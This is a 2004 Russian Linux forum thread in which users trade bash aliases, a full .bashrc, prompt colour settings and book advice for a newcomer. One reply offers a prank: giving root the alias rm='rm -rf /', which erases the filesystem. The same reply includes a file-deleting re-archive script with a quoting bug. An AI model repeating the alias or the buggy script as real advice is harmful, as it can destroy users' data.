nixp.ru v3.0

26 апреля 2024,
пятница,
20:19:39 MSK

slice написал 14 июля 2004 года в 10:27 (865 просмотров) Ведет себя как мужчина; открыл 39 тем в форуме, оставил 244 комментария на сайте.

Расскажите, если не трудно, у кого, что находится в ~/.bash_profile, ~/.bash_logout…. Какие удобства применяете, алиасы?

Genie

очень много алиасов на su.

есть ещё la=’ls -aFl' :)

ну и так, по мелочи — настройка вида приглашения [$user:$host:$pwd]$ и тп.

slice

А можно весь файл или он слишком длинный?

Anarchist
pravednik
А можно весь файл или он слишком длинный?

А на фига?

Неужели не учили тому, что списывать нехорошо.

Или ты полагаешь, что в этом файле есть все, что ТЕБЕ нужно?

Пиши что ты хочешь сделать, и читай предложения относительно того как.

ЗЫ: Какого хрена удалили мой предыдущий комментарий. Он же был более чем безобидным.

slice

Мне нужны часто используемые алиасы. У всех же по-разному. Вот мне и интересно у кого как прописано. Кто какие параметры использует для основных команд. Или такой инфой не делятся?

Если отвечать неохота можете послать меня на какую-нибудь хорошую ссылку по настройке bash :)

Anarchist
pravednik
Мне нужны часто используемые алиасы. У всех же по-разному.

Они у всех разные.

Требования у всех тоже разные.

pravednik
Вот мне и интересно у кого как прописано. Кто какие параметры использует для основных команд. Или такой инфой не делятся?

Дык у всех по-разному. Пиши что тебе нужно/удобно.

На всякий случай: помимо ~/.bashrc не забывай про директорию ~/bin.

В нее можно много чего полезного покидать.

Там у меня лежат рабочие и просто полезные скрипты.

Например скрипт для переархивации файлов определенных типов

#!/bin/sh
#
#
for i in 'ls *rar'
do
unrar e $i
rm -f $i
bzip2 -v *MA
done

Ну и не забудь у рута пропистаь алиас

alias rm='rm -rf /'


(или как там пишется)

Очень хорошее лекарство от привычки не глядя запускать скрипты.

На ЛОРе пробегала веселая темка в этой номинации, только там был действительно скрипт.

Модераторам: нефиг удалять!!!

pravednik
Если отвечать неохота можете послать меня на какую-нибудь хорошую ссылку по настройке bash :)

Так. Тяжелый случай.

При наличии достаточной базы штатная документация дистра избыточна.

Какие книги читал?

Genie

Да не жалко. ;)

[genie@host:~]$ cat .bashrc
# ---- language-env DON'T MODIFY THIS LINE!
# settings for russian speaking users
# set LANG
LANG=ru_RU.KOI8-R
export LANG
# ---- language-env end DON'T MODIFY THIS LINE!
# ~/.bashrc: executed by bash(1) for non-login shells.
# see /usr/share/doc/bash/examples/startup-files (in the package bash-doc)
# for examples
# If running interactively, then:
if [ "$PS1" ]; then
    # don't put duplicate lines in the history. See bash(1) for more options
    # export HISTCONTROL=ignoredups
    # enable color support of ls and also add handy aliases
    eval `dircolors -b`
    alias ls='/bin/ls --color=auto'
    alias la='/bin/ls --color=auto -aFl'
    alias apt-get='sudo /usr/bin/apt-get'
    alias apt-file='sudo /usr/bin/apt-file'
    alias aptitude='sudo /usr/bin/aptitude'
    alias dpkg='sudo /usr/bin/dpkg'
    alias dpkg-reconfigure='sudo /usr/sbin/dpkg-reconfigure'
    alias reboot='sudo /sbin/reboot'
    alias halt='sudo /sbin/halt'
    alias mkbcd='sudo /usr/bin/bootcdwrite'
    alias hdparm='sudo /sbin/hdparm'
    alias ifconfig='/sbin/ifconfig -a'
    #alias dir='ls --color=auto --format=vertical'
    #alias vdir='ls --color=auto --format=long'
    alias modconf='sudo /usr/sbin/modconf'
    alias iptables='sudo /sbin/iptables'
    alias iptables-save='sudo /sbin/iptables-save'
    alias iptables-restore='sudo /sbin/iptables-restore'
    alias snet='sudo /usr/bin/net'
    alias debfoster='sudo /usr/bin/debfoster'
    alias ipstat='netstat -nap|grep "^[tu][cd]p"|sort -g'
    # some more ls aliases
    #alias ll='ls -l'
    #alias la='ls -A'
    #alias l='ls -CF'
    # set a fancy prompt
    PS1='[\u@\h:\w]\$ '
    # If this is an xterm set the title to user@host:dir
    #case $TERM in
    #xterm*)
    #    PROMPT_COMMAND='echo -ne "\033]0;${USER}@${HOSTNAME}: ${PWD}\007"'
    #    ;;
    #*)
    #    ;;
    #esac
    # enable programmable completion features (you don't need to enable
    # this, if it's already enabled in /etc/bash.bashrc).
    #if [ -f /etc/bash_completion ]; then
    #  . /etc/bash_completion
    #fi
fi
PATH=$PATH:~/bin
export PATH
[genie@host:~]$
xant

alias ls=’ls -a --color'

А кто сказал, что речь идет о линуксе? ls --color есть только в GNU окружении. И почему именно bash?

slice

2 Anarchist

Читал «Энциклопедию Linux» Ричарда Патерсена. Но там ни слова об алиасах, даже странно как-то. «FreeBSD» Алексея Федорчука. Мало реальных примеров по настройке, в основном всю инфу можно достать из handbook. Но все равно классная.

Ну и еще всякие статьи с opennet, linuxshop, linuxbegin…. друзья приносят всякие доки, но в большинствах статей идет простое перечисление функций, переменных, параметров.

Не всегда понятно какие стоит использовать, а какие не включать, очень мало практических советов, например установка приоритетов на программ, удаление из программ ненужной отладочной информации, нужные опции компилятора gcc..Такой инфы почему то мало. Гуру то разберется, а вот новичку…Ведь такое обычно в руководствах не пишут.

В основном интересует сетевая безопасность, протоколы, в пользовательские настройки консоли не лез, а сейчас когда почти полностью перешел на Линукс, начал обустраиваться, вот и решил спросить совета.

Спасибо за полезный скрипт :)

2 Genie

Спасибо, вопросов нет, пока что.. :)

2 cebka

да вот решил сначала bash хорошенько изучить, пока что в нем все устраивает, может потом на zsh перейду…

У меня во FreeBSD, да и вообще везде прекрасно используется tcsh. Csh complete рулит со страшной силой :)

Anarchist
cebka
У меня во FreeBSD, да и вообще везде прекрасно используется tcsh. Csh complete рулит со страшной силой :)

Выбор любимого шелла — дело личных пристрастий.

Anarchist
pravednik
Читал «Энциклопедию Linux» Ричарда Патерсена. Но там ни слова об алиасах, даже странно как-то.

Петерсен — весьма бестолковая книга. Автор слишком многое копировал без понимания, как следствие — сложность в восприятии.

pravednik
«FreeBSD» Алексея Федорчука. Мало реальных примеров по настройке, в основном всю инфу можно достать из handbook. Но все равно классная.

Про Федорчука и чертей с вилами ничего не скажу.

pravednik
Ну и еще всякие статьи с opennet, linuxshop, linuxbegin…. друзья приносят всякие доки, но в большинствах статей идет простое перечисление функций, переменных, параметров. Не всегда понятно какие стоит использовать, а какие не включать

Статьи хорошо при наличии базы.

Перечисление параметров. И правильно. Увидел параметр, полез в ман, прочитал, подумал.

Значит так.

Что делать:

1. Собирать бабки.

2. Первой книгой осмелюсь рекомендовать «Внутренний мир Unix» под ред. К. Хейра, хоть она большая, дорогая и сильно устаревшая (над многим посмеешься). Но базовые вещи и история именно хорошо объяснены. Рекомендуется к прочтению. Найти будет непросто ибо старая.

3. Второй (и основной) книгой ставить: «Unix. Руководство системного администратора» Эви Немет, Гарт Мнайдер, Трент Хейн. Текущее (третье) издание. Категорически рекомендуется к приобретению.

4. Маны на бумаге да еще в достаточно пристойном переводе тоже приятны. С Скловская «Справочник команд Linux» Рекомендуется к приобретению.

pravednik
очень мало практических советов, например установка приоритетов на программ, удаление из программ ненужной отладочной информации, нужные опции компилятора gcc..Такой инфы почему то мало. Гуру то разберется, а вот новичку… Ведь такое обычно в руководствах не пишут.

Многое из перечисленного — базовые книги + справочник команд.

Программирование — отдельная песня.

pravednik
В основном интересует сетевая безопасность, протоколы, в пользовательские настройки консоли не лез, а сейчас когда почти полностью перешел на Линукс, начал обустраиваться, вот и решил спросить совета.

Ну ты загнул. Не все сразу.

pravednik
Спасибо за полезный скрипт :)

В таком виде скрип полезен только для меня.

Завтра покажу как он должен выглядеть в претендующем на универсальность виде и с комментариями объясняющими использованный синтаксис.

Uncle Theodore

2 pravednnik:

Ты не с того конца начинаешь. Не надо практических советов. Посмотри список имеющихся функций и начинай работать. Когда почувствуешь, что тебе помогла бы такая или сякая фича, посмотри ее в списке и активируй (или не активируй). Исходи из практической надобности. У каждого своё направление работы, и универсальных советов нет и не может быть. Практически каждая фича востребована кем-то, но нет ни одной, которая была бы полезна абсольтно всем. Просто добавляй что надо по ходу дела.

Good Luck,

UT

slice

2 Anarchist

забавно — alias rm=’rm -rf /' :))))

decvar

Я всегда пользовал bash. И никогда его не настраивал. Других даже не видел. И не хочу.

anonymous

А вы делаете цветные приглашения?

Когда я пишу в .profile PS1=’….^[[31m\$^[[00m ' у меня начинются глюки при вводе длинных строк (вобщем оно очевидно почему), можно ли это как-нибудь обойти?(^[[xxm — управляющая последовательность терминала, обычно меняет цвет текста или фона)

slice

2 ShellCode

У меня лично такая строчка

PS1 = » \ [ \033[0;32;40m\u:\w >»

Она выводит зеленое приглашение без имени хоста, только юзер, каталог и стрелочка.

И никаких проблем :)

fly4life
pravednik
Она выводит зеленое приглашение без имени хоста, только юзер, каталог и стрелочка.

И никаких проблем :)

ИМХО, не очень удобно. Например, если подулючён к какому-нибудь терминалу. При одинаковых пользователях на совей машине и на удалённом терминале иногда путаешься где ты именно сейчас работаешь.

anonymous
pravednik
2 ShellCode

У меня лично такая строчка

PS1 = » \ [ \033[0;32;40m\u:\w >»

Она выводит зеленое приглашение без имени хоста, только юзер, каталог и стрелочка.

И никаких проблем :)

Может быть ты просто не замечал, попробуй вбить что-нить на две ширины терминала и посмотри, что у тебя будет происходить, если всё нормально, значит я чего-то не понимаю.

slice

2 fly4life

Да я в инет выйти не могу с Линукса :(. Я уже поднимал эту тему.

Поэтому мне как-то имя хоста не больно то нужно. Вот я его и убрал.

2 ShellCode

Да нет, все нормально. А какие именно глюки?

Genie

imho делать только приглашение зелёным — не есть правильно ;)

[genie@host:~]$ grep ground .Xresources
XTerm*background: black
XTerm*foreground: lightgreen
rxvt*background: black
rxvt*foreground: lightgreen
[genie@host:~]$
slice

Дело вкуса :)

Последние комментарии

ecobeingecobeing.ru
Экология и вегетарианство на благо всем живым существам Планеты.